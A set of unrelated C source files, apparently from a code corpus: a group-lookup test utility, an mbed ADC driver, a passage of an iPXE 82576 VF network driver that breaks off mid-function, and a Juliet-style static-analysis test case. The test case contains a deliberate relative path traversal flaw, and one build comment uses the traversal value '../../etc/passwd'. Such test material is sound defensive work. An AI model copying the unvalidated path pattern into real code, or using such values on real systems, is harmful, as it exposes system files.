atoi(pszGid); return 0; } int main( int argc, char* argv[] ) { gid_t gid = 0; int ret = 0; PSTR pszGroupName = NULL; ret = ParseArgs(argc, argv, &gid); if( ret != 0 ) { goto error; } pszGroupName = IDtogroup ( gid ); printf("IDtoGroup:\n"); printf("==========\n"); printf("Gid: %u\n", (unsigned int)gid); printf("Group Name: %s\n" , LW_IS_NULL_OR_EMPTY_STR(pszGroupName) ? "<null>" : pszGroupName); cleanup: LW_SAFE_FREE_STRING(pszGroupName); return ret; error: ret = 1; goto cleanup; }
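/* Usage sketch (follows the ShowUsage() string above; the gid value 1000 is
   illustrative):

     ./test-getgracct idtogroup 1000

   prints the group name that IDtogroup() resolves for gid 1000, or <null>
   if the lookup fails. */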
1001097.c
/* mbed Microcontroller Library * Copyright (c) 2006-2013 ARM Limited * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include "mbed_assert.h" #include "analogin_api.h" #if DEVICE_ANALOGIN #include "cmsis.h" #include "pinmap.h" #include "PeripheralNames.h" #include "fsl_adc16.h" #include "PeripheralPins.h" /* Array of ADC peripheral base address. */ static ADC_Type *const adc_addrs[] = ADC_BASE_PTRS; #define MAX_FADC 6000000 void analogin_init(analogin_t *obj, PinName pin) { obj->adc = (ADCName)pinmap_peripheral(pin, PinMap_ADC); MBED_ASSERT(obj->adc != (ADCName)NC); uint32_t instance = obj->adc >> ADC_INSTANCE_SHIFT; uint32_t bus_clock; adc16_config_t adc16_config; bus_clock = CLOCK_GetFreq(kCLOCK_BusClk); uint32_t clkdiv; for (clkdiv = 0; clkdiv < 4; clkdiv++) { if ((bus_clock >> clkdiv) <= MAX_FADC) break; } if (clkdiv == 4) { clkdiv = 0x3; //Set max div } ADC16_GetDefaultConfig(&adc16_config); adc16_config.clockSource = kADC16_ClockSourceAlt0; adc16_config.clockDivider = (adc16_clock_divider_t)clkdiv; adc16_config.resolution = kADC16_ResolutionSE16Bit; ADC16_Init(adc_addrs[instance], &adc16_config); ADC16_EnableHardwareTrigger(adc_addrs[instance], false); ADC16_SetHardwareAverage(adc_addrs[instance], kADC16_HardwareAverageCount4); ADC16_SetChannelMuxMode(adc_addrs[instance], obj->adc & (1 << ADC_B_CHANNEL_SHIFT) ? kADC16_ChannelMuxB : kADC16_ChannelMuxA); pinmap_pinout(pin, PinMap_ADC); } uint16_t analogin_read_u16(analogin_t *obj) { uint32_t instance = obj->adc >> ADC_INSTANCE_SHIFT; adc16_channel_config_t adc16_channel_config; adc16_channel_config.channelNumber = obj->adc & 0xF; adc16_channel_config.enableInterruptOnConversionCompleted = false; /* * When in software trigger mode, each conversion would be launched once calling the "ADC16_ChannelConfigure()" * function, which works like writing a conversion command and executing it. */ ADC16_SetChannelConfig(adc_addrs[instance], 0, &adc16_channel_config); while (0U == (kADC16_ChannelConversionDoneFlag & ADC16_GetChannelStatusFlags(adc_addrs[instance], 0))) { } return ADC16_GetChannelConversionValue(adc_addrs[instance], 0); } float analogin_read(analogin_t *obj) { uint16_t value = analogin_read_u16(obj); return (float)value * (1.0f / (float)0xFFFF); } #endif
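/* Usage sketch (not part of the original file): reading one sample through
   this API from board-level code. The pin name A0 is an assumption; any
   ADC-capable PinName from the target's PeripheralPins works.

     analogin_t adc;
     analogin_init (&adc, A0);
     uint16_t raw  = analogin_read_u16 (&adc);  // 16-bit conversion result
     float    norm = analogin_read (&adc);      // same reading scaled to [0.0, 1.0]
*/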
405815.c
/* TEMPLATE GENERATED TESTCASE FILE Filename: CWE23_Relative_Path_Traversal__char_Environment_open_03.c Label Definition File: CWE23_Relative_Path_Traversal.label.xml Template File: sources-sink-03.tmpl.c */ /* * @description * CWE: 23 Relative Path Traversal * BadSource: Environment Read input from an environment variable * GoodSource: File name without a period or slash * Sink: open * BadSink : * Flow Variant: 03 Control flow: if(5==5) and if(5!=5) * * */ #include "std_testcase.h" #ifdef _WIN32 #define BASEPATH "c:\\temp\\" #else #define BASEPATH "/tmp/" #endif #define ENV_VARIABLE "ADD" #ifdef _WIN32 # define GETENV getenv #else # define GETENV getenv #endif #ifdef _WIN32 # define OPEN _open # define CLOSE _close #else # define OPEN open # define CLOSE close #endif #ifndef OMITBAD void CWE23_Relative_Path_Traversal__char_Environment_open_03_bad() { char * data; char data_buf[FILENAME_MAX] = BASEPATH; data = data_buf; if(5==5) { { /* Read input from an environment variable */ size_t data_len = strlen(data); char * environment = GETENV(ENV_VARIABLE); /* If there is data in the environment variable */ if (environment != NULL) { strncat(data+data_len, environment, 100-data_len-1); } } } else { /* INCIDENTAL: CWE 561 Dead Code, the code below will never run */ /* FIX: File name does not contain a period or slash */ strcat(data, "file.txt"); } { int fd; /* POTENTIAL FLAW: Possibly opening a file without validating the file name or path */ fd = OPEN(data, O_RDWR|O_CREAT, S_IREAD|S_IWRITE); if (fd != -1) { CLOSE(fd); } } } #endif /* OMITBAD */ #ifndef OMITGOOD /* goodG2B1() - use goodsource and badsink by changing the 5==5 to 5!=5 */ static void goodG2B1() { char * data; char data_buf[FILENAME_MAX] = BASEPATH; data = data_buf; if(5!=5) { /* INCIDENTAL: CWE 561 Dead Code, the code below will never run */ { /* Read input from an environment variable */ size_t data_len = strlen(data); char * environment = GETENV(ENV_VARIABLE); /* If there is data in the environment variable */ if (environment != NULL) { strncat(data+data_len, environment, 100-data_len-1); } } } else { /* FIX: File name does not contain a period or slash */ strcat(data, "file.txt"); } { int fd; /* POTENTIAL FLAW: Possibly opening a file without validating the file name or path */ fd = OPEN(data, O_RDWR|O_CREAT, S_IREAD|S_IWRITE); if (fd != -1) { CLOSE(fd); } } } /* goodG2B2() - use goodsource and badsink by reversing the blocks in the if statement */ static void goodG2B2() { char * data; char data_buf[FILENAME_MAX] = BASEPATH; data = data_buf; if(5==5) { /* FIX: File name does not contain a period or slash */ strcat(data, "file.txt"); } else { /* INCIDENTAL: CWE 561 Dead Code, the code below will never run */ { /* Read input from an environment variable */ size_t data_len = strlen(data); char * environment = GETENV(ENV_VARIABLE); /* If there is data in the environment variable */ if (environment != NULL) { strncat(data+data_len, environment, 100-data_len-1); } } } { int fd; /* POTENTIAL FLAW: Possibly opening a file without validating the file name or path */ fd = OPEN(data, O_RDWR|O_CREAT, S_IREAD|S_IWRITE); if (fd != -1) { CLOSE(fd); } } } void CWE23_Relative_Path_Traversal__char_Environment_open_03_good() { goodG2B1(); goodG2B2(); } #endif /* OMITGOOD */ /* Below is the main(). It is only used when building this testcase on its own for testing or for building a binary to use in testing binary analysis tools. It is not used when compiling all the testcases as one application, which is how source code analysis tools are tested. 
*/ #ifdef INCLUDEMAIN int main(int argc, char * argv[]) { /* seed randomness */ srand( (unsigned)time(NULL) ); #ifndef OMITGOOD printLine("Calling good()..."); CWE23_Relative_Path_Traversal__char_Environment_open_03_good(); printLine("Finished good()"); #endif /* OMITGOOD */ #ifndef OMITBAD printLine("Calling bad()..."); CWE23_Relative_Path_Traversal__char_Environment_open_03_bad(); printLine("Finished bad()"); #endif /* OMITBAD */ return 0; } #endif
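/* Build sketch (assumption: the Juliet suite's testcasesupport sources, e.g.
   io.c, are available alongside this file):

     cc -DINCLUDEMAIN -I testcasesupport CWE23_Relative_Path_Traversal__char_Environment_open_03.c io.c -o cwe23_03
     ADD=../../etc/passwd ./cwe23_03

   Setting the ADD environment variable exercises the tainted source in the
   bad() variant; the goodG2B variants ignore it and open the fixed name. */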
123486.c
/******************************************************************************* Intel(R) 82576 Virtual Function Linux driver Copyright(c) 2009 Intel Corporation. Copyright(c) 2010 Eric Keller <ekeller@princeton.edu> Copyright(c) 2010 Red Hat Inc. Alex Williamson <alex.williamson@redhat.com> This program is free software; you can redistribute it and/or modify it under the terms and conditions of the GNU General Public License, version 2, as published by the Free Software Foundation. This program is distributed in the hope it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin St - Fifth Floor, Boston, MA 02110-1301 USA. The full GNU General Public License is included in this distribution in the file called "COPYING". Contact Information: e1000-devel Mailing List <e1000-devel@lists.sourceforge.net> Intel Corporation, 5200 N.E. Elam Young Parkway, Hillsboro, OR 97124-6497 *******************************************************************************/ FILE_LICENCE ( GPL2_ONLY ); #include "igbvf.h" /** * igbvf_setup_tx_resources - allocate Tx resources (Descriptors) * * @v adapter e1000 private structure * * @ret rc Returns 0 on success, negative on failure **/ int igbvf_setup_tx_resources ( struct igbvf_adapter *adapter ) { DBG ( "igbvf_setup_tx_resources\n" ); /* Allocate transmit descriptor ring memory. It must not cross a 64K boundary because of hardware errata #23 so we use malloc_dma() requesting a 128 byte block that is 128 byte aligned. This should guarantee that the memory allocated will not cross a 64K boundary, because 65536 is an even multiple of 128 ( 65536 / 128 == 512 ), so all possible allocations of 128 bytes on a 128 byte boundary will not cross 64K bytes. */ adapter->tx_base = malloc_dma ( adapter->tx_ring_size, adapter->tx_ring_size ); if ( !
adapter->tx_base ) { return -ENOMEM; } memset ( adapter->tx_base, 0, adapter->tx_ring_size ); DBG ( "adapter->tx_base = %#08lx\n", virt_to_bus ( adapter->tx_base ) ); return 0; } /** * igbvf_free_tx_resources - Free Tx Resources per Queue * @adapter: board private structure * * Free all transmit software resources **/ void igbvf_free_tx_resources ( struct igbvf_adapter *adapter ) { DBG ( "igbvf_free_tx_resources\n" ); free_dma ( adapter->tx_base, adapter->tx_ring_size ); } /** * igbvf_free_rx_resources - Free Rx Resources * @adapter: board private structure * * Free all receive software resources **/ void igbvf_free_rx_resources ( struct igbvf_adapter *adapter ) { int i; DBG ( "igbvf_free_rx_resources\n" ); free_dma ( adapter->rx_base, adapter->rx_ring_size ); for ( i = 0; i < NUM_RX_DESC; i++ ) { free_iob ( adapter->rx_iobuf[i] ); } } /** * igbvf_refill_rx_ring - allocate Rx io_buffers * * @v adapter e1000 private structure * * @ret rc Returns 0 on success, negative on failure **/ static int igbvf_refill_rx_ring ( struct igbvf_adapter *adapter ) { int i, rx_curr; int rc = 0; union e1000_adv_rx_desc *rx_curr_desc; struct e1000_hw *hw = &adapter->hw; struct io_buffer *iob; DBGP ("igbvf_refill_rx_ring\n"); for ( i = 0; i < NUM_RX_DESC; i++ ) { rx_curr = ( ( adapter->rx_curr + i ) % NUM_RX_DESC ); rx_curr_desc = adapter->rx_base + rx_curr; if ( rx_curr_desc->wb.upper.status_error & E1000_RXD_STAT_DD ) continue; if ( adapter->rx_iobuf[rx_curr] != NULL ) continue; DBG2 ( "Refilling rx desc %d\n", rx_curr ); iob = alloc_iob ( MAXIMUM_ETHERNET_VLAN_SIZE ); adapter->rx_iobuf[rx_curr] = iob; rx_curr_desc->wb.upper.status_error = 0; if ( ! iob ) { DBG ( "alloc_iob failed\n" ); rc = -ENOMEM; break; } else { rx_curr_desc->read.pkt_addr = virt_to_bus ( iob->data ); rx_curr_desc->read.hdr_addr = 0; ew32 ( RDT(0), rx_curr ); } } return rc; } /** * igbvf_irq_disable - Mask off interrupt generation on the NIC * @adapter: board private structure **/ static void igbvf_irq_disable ( struct igbvf_adapter *adapter ) { struct e1000_hw *hw = &adapter->hw; ew32 ( EIMC, ~0 ); } /** * igbvf_irq_enable - Enable default interrupt generation settings * @adapter: board private structure **/ static void igbvf_irq_enable ( struct igbvf_adapter *adapter ) { struct e1000_hw *hw = &adapter->hw; ew32 ( EIAC, IMS_ENABLE_MASK ); ew32 ( EIAM, IMS_ENABLE_MASK ); ew32 ( EIMS, IMS_ENABLE_MASK ); } /** * igbvf_irq - enable or Disable interrupts * * @v adapter e1000 adapter * @v action requested interrupt action **/ static void igbvf_irq ( struct net_device *netdev, int enable ) { struct igbvf_adapter *adapter = netdev_priv ( netdev ); DBG ( "igbvf_irq\n" ); if ( enable ) { igbvf_irq_enable ( adapter ); } else { igbvf_irq_disable ( adapter ); } } /** * igbvf_process_tx_packets - process transmitted packets * * @v netdev network interface device structure **/ static void igbvf_process_tx_packets ( struct net_device *netdev ) { struct igbvf_adapter *adapter = netdev_priv ( netdev ); uint32_t i; uint32_t tx_status; union e1000_adv_tx_desc *tx_curr_desc; /* Check status of transmitted packets */ DBGP ( "process_tx_packets: tx_head = %d, tx_tail = %d\n", adapter->tx_head, adapter->tx_tail ); while ( ( i = adapter->tx_head ) != adapter->tx_tail ) { tx_curr_desc = ( void * ) ( adapter->tx_base ) + ( i * sizeof ( *adapter->tx_base ) ); tx_status = tx_curr_desc->wb.status; DBG ( " tx_curr_desc = %#08lx\n", virt_to_bus ( tx_curr_desc ) ); DBG ( " tx_status = %#08x\n", tx_status ); /* if the packet at tx_head is not owned by hardware it is for 
us */ if ( ! ( tx_status & E1000_TXD_STAT_DD ) ) break; DBG ( "Sent packet. tx_head: %d tx_tail: %d tx_status: %#08x\n", adapter->tx_head, adapter->tx_tail, tx_status ); netdev_tx_complete ( netdev, adapter->tx_iobuf[i] ); DBG ( "Success transmitting packet, tx_status: %#08x\n", tx_status ); /* Decrement count of used descriptors, clear this descriptor */ adapter->tx_fill_ctr--; memset ( tx_curr_desc, 0, sizeof ( *tx_curr_desc ) ); adapter->tx_head = ( adapter->tx_head + 1 ) % NUM_TX_DESC; } } /** * igbvf_process_rx_packets - process received packets * * @v netdev network interface device structure **/ static void igbvf_process_rx_packets ( struct net_device *netdev ) { struct igbvf_adapter *adapter = netdev_priv ( netdev ); struct e1000_hw *hw = &adapter->hw; uint32_t i; uint32_t rx_status; uint32_t rx_len; uint32_t rx_err; union e1000_adv_rx_desc *rx_curr_desc; DBGP ( "igbvf_process_rx_packets\n" ); /* Process received packets */ while ( 1 ) { i = adapter->rx_curr; rx_curr_desc = ( void * ) ( adapter->rx_base ) + ( i * sizeof ( *adapter->rx_base ) ); rx_status = rx_curr_desc->wb.upper.status_error; DBG2 ( "Before DD Check RX_status: %#08x, rx_curr: %d\n", rx_status, i ); if ( ! ( rx_status & E1000_RXD_STAT_DD ) ) break; if ( adapter->rx_iobuf[i] == NULL ) break; DBG ( "E1000_RCTL = %#08x\n", er32 (RCTL) ); rx_len = rx_curr_desc->wb.upper.length; DBG ( "Received packet, rx_curr: %d rx_status: %#08x rx_len: %d\n", i, rx_status, rx_len ); rx_err = rx_status; iob_put ( adapter->rx_iobuf[i], rx_len ); if ( rx_err & E1000_RXDEXT_ERR_FRAME_ERR_MASK ) { netdev_rx_err ( netdev, adapter->rx_iobuf[i], -EINVAL ); DBG ( "igbvf_process_rx_packets: Corrupted packet received!" " rx_err: %#08x\n", rx_err ); } else { /* Add this packet to the receive queue. */ netdev_rx ( netdev, adapter->rx_iobuf[i] ); } adapter->rx_iobuf[i] = NULL; memset ( rx_curr_desc, 0, sizeof ( *rx_curr_desc ) ); adapter->rx_curr = ( adapter->rx_curr + 1 ) % NUM_RX_DESC; } } /** * igbvf_poll - Poll for received packets * * @v netdev Network device */ static void igbvf_poll ( struct net_device *netdev ) { struct igbvf_adapter *adapter = netdev_priv ( netdev ); uint32_t rx_status; union e1000_adv_rx_desc *rx_curr_desc; DBGP ( "igbvf_poll\n" ); rx_curr_desc = ( void * ) ( adapter->rx_base ) + ( adapter->rx_curr * sizeof ( *adapter->rx_base ) ); rx_status = rx_curr_desc->wb.upper.status_error; if ( ! ( rx_status & E1000_RXD_STAT_DD ) ) return; igbvf_process_tx_packets ( netdev ); igbvf_process_rx_packets ( netdev ); igbvf_refill_rx_ring ( adapter ); } /** * igbvf_config_collision_dist_generic - Configure collision distance * @hw: pointer to the HW structure * * Configures the collision distance to the default value and is used * during link setup. Currently no func pointer exists and all * implementations are handled in the generic version of this function. **/ void igbvf_config_collision_dist ( struct e1000_hw *hw ) { u32 tctl; DBG ("igbvf_config_collision_dist"); tctl = er32 (TCTL); tctl &= ~E1000_TCTL_COLD; tctl |= E1000_COLLISION_DISTANCE << E1000_COLD_SHIFT; ew32 (TCTL, tctl); e1e_flush(); } /** * igbvf_configure_tx - Configure Transmit Unit after Reset * @adapter: board private structure * * Configure the Tx unit of the MAC after a reset. 
**/ static void igbvf_configure_tx ( struct igbvf_adapter *adapter ) { struct e1000_hw *hw = &adapter->hw; u32 tctl, txdctl; DBG ( "igbvf_configure_tx\n" ); /* disable transmits while setting up the descriptors */ tctl = er32 ( TCTL ); ew32 ( TCTL, tctl & ~E1000_TCTL_EN ); e1e_flush(); mdelay (10); ew32 ( TDBAH(0), 0 ); ew32 ( TDBAL(0), virt_to_bus ( adapter->tx_base ) ); ew32 ( TDLEN(0), adapter->tx_ring_size ); DBG ( "E1000_TDBAL(0): %#08x\n", er32 ( TDBAL(0) ) ); DBG ( "E1000_TDLEN(0): %d\n", er32 ( TDLEN(0) ) ); /* Setup the HW Tx Head and Tail descriptor pointers */ ew32 ( TDH(0), 0 ); ew32 ( TDT(0), 0 ); adapter->tx_head = 0; adapter->tx_tail = 0; adapter->tx_fill_ctr = 0; txdctl = er32(TXDCTL(0)); txdctl |= E1000_TXDCTL_QUEUE_ENABLE; ew32 ( TXDCTL(0), txdctl ); txdctl = er32 ( TXDCTL(0) ); txdctl |= E1000_TXDCTL_QUEUE_ENABLE; ew32 ( TXDCTL(0), txdctl ); /* Setup Transmit Descriptor Settings for eop descriptor */ adapter->txd_cmd = E1000_ADVTXD_DCMD_EOP | E1000_ADVTXD_DCMD_IFCS; /* Advanced descriptor */ adapter->txd_cmd |= E1000_ADVTXD_DCMD_DEXT; /* (not part of cmd, but in same 32 bit word...) */ adapter->txd_cmd |= E1000_ADVTXD_DTYP_DATA; /* enable Report Status bit */ adapter->txd_cmd |= E1000_ADVTXD_DCMD_RS; /* Program the Transmit Control Register */ tctl &= ~E1000_TCTL_CT; tctl |= E1000_TCTL_PSP | E1000_TCTL_RTLC | (E1000_COLLISION_THRESHOLD << E1000_CT_SHIFT); igbvf_config_collision_dist ( hw ); /* Enable transmits */ tctl |= E1000_TCTL_EN; ew32(TCTL, tctl); e1e_flush(); } /* igbvf_reset - bring the hardware into a known good state * * This function boots the hardware and enables some settings that * require a configuration cycle of the hardware - those cannot be * set/changed during runtime. After reset the device needs to be * properly configured for Rx, Tx etc. */ void igbvf_reset ( struct igbvf_adapter *adapter ) { struct e1000_mac_info *mac = &adapter->hw.mac; struct net_device *netdev = adapter->netdev; struct e1000_hw *hw = &adapter->hw; /* Allow time for pending master requests to run */ if ( mac->ops.reset_hw(hw) ) DBG ("PF still resetting\n"); mac->ops.init_hw ( hw ); if ( is_valid_ether_addr(adapter->hw.mac.addr) ) { memcpy ( netdev->hw_addr, adapter->hw.mac.addr, ETH_ALEN ); } } extern void igbvf_init_function_pointers_vf(struct e1000_hw *hw); /** * igbvf_sw_init - Initialize general software structures (struct igbvf_adapter) * @adapter: board private structure to initialize * * igbvf_sw_init initializes the Adapter private data structure. * Fields are initialized based on PCI device information and * OS network device settings (MTU size). **/ static int __devinit igbvf_sw_init ( struct igbvf_adapter *adapter ) { struct e1000_hw *hw = &adapter->hw; struct pci_device *pdev = adapter->pdev; int rc; /* PCI config space info */ hw->vendor_id = pdev->vendor; hw->device_id = pdev->device; pci_read_config_byte ( pdev, PCI_REVISION, &hw->revision_id ); pci_read_config_word ( pdev, PCI_COMMAND, &hw->bus.pci_cmd_word ); adapter->max_frame_size = MAXIMUM_ETHERNET_VLAN_SIZE + ETH_HLEN + ETH_FCS_LEN; adapter->min_frame_size = ETH_ZLEN + ETH_FCS_LEN; /* Set various function pointers */ igbvf_init_function_pointers_vf ( &adapter->hw ); rc = adapter->hw.mac.ops.init_params ( &adapter->hw ); if (rc) { DBG ("hw.mac.ops.init_params(&adapter->hw) Failure\n"); return rc; } rc = adapter->hw.mbx.ops.init_params ( &adapter->hw ); if (rc) { DBG ("hw.mbx.ops.init_params(&adapter->hw) Failure\n"); return rc; } /* Explicitly disable IRQ since the NIC can be in any state. 
*/ igbvf_irq_disable ( adapter ); return 0; } /** * igbvf_setup_srrctl - configure the receive control registers * @adapter: Board private structure **/ static void igbvf_setup_srrctl ( struct igbvf_adapter *adapter ) { struct e1000_hw *hw = &adapter->hw; u32 srrctl = 0; DBG ( "igbvf_setup_srrctl\n" ); srrctl &= ~(E1000_SRRCTL_DESCTYPE_MASK | E1000_SRRCTL_BSIZEHDR_MASK | E1000_SRRCTL_BSIZEPKT_MASK); /* Enable queue drop to avoid head of line blocking */ srrctl |= E1000_SRRCTL_DROP_EN; /* Setup buffer sizes */ srrctl |= 2048 >> E1000_SRRCTL_BSIZEPKT_SHIFT; srrctl |= E1000_SRRCTL_DESCTYPE_ADV_ONEBUF; ew32 ( SRRCTL(0), srrctl ); } /** * igbvf_configure_rx - Configure 82576 VF Receive Unit after Reset * @adapter: board private structure * * Configure the Rx unit of the MAC after a reset. **/ static void igbvf_configure_rx ( struct igbvf_adapter *adapter ) { struct e1000_hw *hw = &adapter->hw; u32 rxdctl; DBG ( "igbvf_configure_rx\n" ); /* disable receives */ rxdctl = er32 ( RXDCTL(0) ); ew32 ( RXDCTL(0), rxdctl & ~E1000_RXDCTL_QUEUE_ENABLE ); msleep ( 10 ); /* * Setup the HW Rx Head and Tail Descriptor Pointers and * the Base and Length of the Rx Descriptor Ring */ ew32 ( RDBAL(0), virt_to_bus (adapter->rx_base) ); ew32 ( RDBAH(0), 0 ); ew32 ( RDLEN(0), adapter->rx_ring_size ); adapter->rx_curr = 0; ew32 ( RDH(0), 0 ); ew32 ( RDT(0), 0 ); rxdctl |= E1000_RXDCTL_QUEUE_ENABLE; rxdctl &= 0xFFF00000; rxdctl |= IGBVF_RX_PTHRESH; rxdctl |= IGBVF_RX_HTHRESH << 8; rxdctl |= IGBVF_RX_WTHRESH << 16; igbvf_rlpml_set_vf ( hw, adapter->max_frame_size ); /* enable receives */ ew32 ( RXDCTL(0), rxdctl ); ew32 ( RDT(0), NUM_RX_DESC ); } /** * igbvf_setup_rx_resources - allocate Rx resources (Descriptors) * * @v adapter e1000 private structure **/ int igbvf_setup_rx_resources ( struct igbvf_adapter *adapter ) { int i; union e1000_adv_rx_desc *rx_curr_desc; struct io_buffer *iob; DBG ( "igbvf_setup_rx_resources\n" ); /* Allocate receive descriptor ring memory. It must not cross a 64K boundary because of hardware errata */ adapter->rx_base = malloc_dma ( adapter->rx_ring_size, adapter->rx_ring_size ); if ( ! adapter->rx_base ) { return -ENOMEM; } memset ( adapter->rx_base, 0, adapter->rx_ring_size ); for ( i = 0; i < NUM_RX_DESC; i++ ) { rx_curr_desc = adapter->rx_base + i; iob = alloc_iob ( MAXIMUM_ETHERNET_VLAN_SIZE ); adapter->rx_iobuf[i] = iob; rx_curr_desc->wb.upper.status_error = 0; if ( ! iob ) { DBG ( "alloc_iob failed\n" ); return -ENOMEM; } else { rx_curr_desc->read.pkt_addr = virt_to_bus ( iob->data ); rx_curr_desc->read.hdr_addr = 0; } } return 0; } /** * igbvf_open - Called when a network interface is made active * @netdev: network interface device structure * * Returns 0 on success, negative value on failure * * The open entry point is called when a network interface is made * active by the system (IFF_UP). At this point all resources needed * for transmit and receive operations are allocated, the interrupt * handler is registered with the OS, the watchdog timer is started, * and the stack is notified that the interface is ready.
**/ static int igbvf_open ( struct net_device *netdev ) { struct igbvf_adapter *adapter = netdev_priv ( netdev ); int err; DBG ("igbvf_open\n"); /* Update MAC address */ memcpy ( adapter->hw.mac.addr, netdev->ll_addr, ETH_ALEN ); igbvf_reset( adapter ); /* allocate transmit descriptors */ err = igbvf_setup_tx_resources ( adapter ); if (err) { DBG ( "Error setting up TX resources!\n" ); goto err_setup_tx; } igbvf_configure_tx ( adapter ); igbvf_setup_srrctl( adapter ); err = igbvf_setup_rx_resources( adapter ); if (err) { DBG ( "Error setting up RX resources!\n" ); goto err_setup_rx; } igbvf_configure_rx ( adapter ); return 0; err_setup_rx: DBG ( "err_setup_rx\n" ); igbvf_free_tx_resources ( adapter ); return err; err_setup_tx: DBG ( "err_setup_tx\n" ); igbvf_reset ( adapter ); return err; } /** * igbvf_close - Disables a network interface * @netdev: network interface device structure * * Returns 0, this is not allowed to fail * * The close entry point is called when an interface is de-activated * by the OS. The hardware is still under the drivers control, but * needs to be disabled. A global MAC reset is issued to stop the * hardware, and all transmit and receive resources are freed. **/ static void igbvf_close ( struct net_device *netdev ) { struct igbvf_adapter *adapter = netdev_priv ( netdev ); struct e1000_hw *hw = &adapter->hw; uint32_t rxdctl; DBG ( "igbvf_close\n" ); /* Disable and acknowledge interrupts */ igbvf_irq_disable ( adapter ); er32(EICR); /* disable receives */ rxdctl = er32 ( RXDCTL(0) ); ew32 ( RXDCTL(0), rxdctl & ~E1000_RXDCTL_QUEUE_ENABLE ); mdelay ( 10 ); igbvf_reset ( adapter ); igbvf_free_tx_resources( adapter ); igbvf_free_rx_resources( adapter ); } /** * igbvf_transmit - Transmit a packet * * @v netdev Network device * @v iobuf I/O buffer * * @ret rc Returns 0 on success, negative on failure */ static int igbvf_transmit ( struct net_device *netdev, struct io_buffer *iobuf ) { struct igbvf_adapter *adapter = netdev_priv ( netdev ); struct e1000_hw *hw = &adapter->hw; uint32_t tx_curr = adapter->tx_tail; union e1000_adv_tx_desc *tx_curr_desc; DBGP ("igbvf_transmit\n"); if ( adapter->tx_fill_ctr == NUM_TX_DESC ) { DBG ("TX overflow\n"); return -ENOBUFS; } /* Save pointer to iobuf we have been given to transmit, netdev_tx_complete() will need it later */ adapter->tx_iobuf[tx_curr] = iobuf; tx_curr_desc = ( void * ) ( adapter->tx_base ) + ( tx_curr * sizeof ( *adapter->tx_base ) ); DBG ( "tx_curr_desc = %#08lx\n", virt_to_bus ( tx_curr_desc ) ); DBG ( "tx_curr_desc + 16 = %#08lx\n", virt_to_bus ( tx_curr_desc ) + 16 ); DBG ( "iobuf->data = %#08lx\n", virt_to_bus ( iobuf->data ) ); /* Add the packet to TX ring */ tx_curr_desc->read.buffer_addr = virt_to_bus ( iobuf->data ); tx_curr_desc->read.cmd_type_len = adapter->txd_cmd |(iob_len ( iobuf )) ; // minus hdr_len ???? 
tx_curr_desc->read.olinfo_status = ((iob_len ( iobuf )) << E1000_ADVTXD_PAYLEN_SHIFT); DBG ( "TX fill: %d tx_curr: %d addr: %#08lx len: %zd\n", adapter->tx_fill_ctr, tx_curr, virt_to_bus ( iobuf->data ), iob_len ( iobuf ) ); /* Point to next free descriptor */ adapter->tx_tail = ( adapter->tx_tail + 1 ) % NUM_TX_DESC; adapter->tx_fill_ctr++; /* Write new tail to NIC, making packet available for transmit */ ew32 ( TDT(0), adapter->tx_tail ); e1e_flush (); return 0; } /** igbvf net device operations */ static struct net_device_operations igbvf_operations = { .open = igbvf_open, .close = igbvf_close, .transmit = igbvf_transmit, .poll = igbvf_poll, .irq = igbvf_irq, }; /** * igbvf_get_hw_control - get control of the h/w from f/w * @adapter: address of board private structure * * igb_get_hw_control sets CTRL_EXT:DRV_LOAD bit. * For ASF and Pass Through versions of f/w this means that * the driver is loaded. * **/ void igbvf_get_hw_control ( struct igbvf_adapter *adapter ) { struct e1000_hw *hw = &adapter->hw; u32 ctrl_ext; /* Let firmware know the driver has taken over */ ctrl_ext = er32 ( CTRL_EXT ); ew32 ( CTRL_EXT, ctrl_ext | E1000_CTRL_EXT_DRV_LOAD ); } /** * igbvf_probe - Device Initialization Routine * @pdev: PCI device information struct * @ent: entry in igbvf_pci_tbl * * Returns 0 on success, negative on failure * * igbvf_probe initializes an adapter identified by a pci_dev structure. * The OS initialization, configuring of the adapter private structure, * and a hardware reset occur. **/ int igbvf_probe ( struct pci_device *pdev ) { int err; struct net_device *netdev; struct igbvf_adapter *adapter; unsigned long mmio_start, mmio_len; struct e1000_hw *hw; DBG ( "igbvf_probe\n" ); err = -ENOMEM; /* Allocate net device ( also allocates memory for netdev->priv and makes netdev-priv point to it ) */ netdev = alloc_etherdev ( sizeof ( struct igbvf_adapter ) ); if ( ! netdev ) goto err_alloc_etherdev; /* Associate igbvf-specific network operations operations with * generic network device layer */ netdev_init ( netdev, &igbvf_operations ); /* Associate this network device with given PCI device */ pci_set_drvdata ( pdev, netdev ); netdev->dev = &pdev->dev; /* Initialize driver private storage */ adapter = netdev_priv ( netdev ); memset ( adapter, 0, ( sizeof ( *adapter ) ) ); adapter->pdev = pdev; adapter->ioaddr = pdev->ioaddr; adapter->hw.io_base = pdev->ioaddr; hw = &adapter->hw; hw->vendor_id = pdev->vendor; hw->device_id = pdev->device; adapter->irqno = pdev->irq; adapter->netdev = netdev; adapter->hw.back = adapter; adapter->min_frame_size = ETH_ZLEN + ETH_FCS_LEN; adapter->max_hw_frame_size = ETH_FRAME_LEN + ETH_FCS_LEN; adapter->tx_ring_size = sizeof ( *adapter->tx_base ) * NUM_TX_DESC; adapter->rx_ring_size = sizeof ( *adapter->rx_base ) * NUM_RX_DESC; /* Fix up PCI device */ adjust_pci_device ( pdev ); err = -EIO; mmio_start = pci_bar_start ( pdev, PCI_BASE_ADDRESS_0 ); mmio_len = pci_bar_size ( pdev, PCI_BASE_ADDRESS_0 ); DBG ( "mmio_start: %#08lx\n", mmio_start ); DBG ( "mmio_len: %#08lx\n", mmio_len ); adapter->hw.hw_addr = ioremap ( mmio_start, mmio_len ); DBG ( "adapter->hw.hw_addr: %p\n", adapter->hw.hw_addr ); if ( ! 
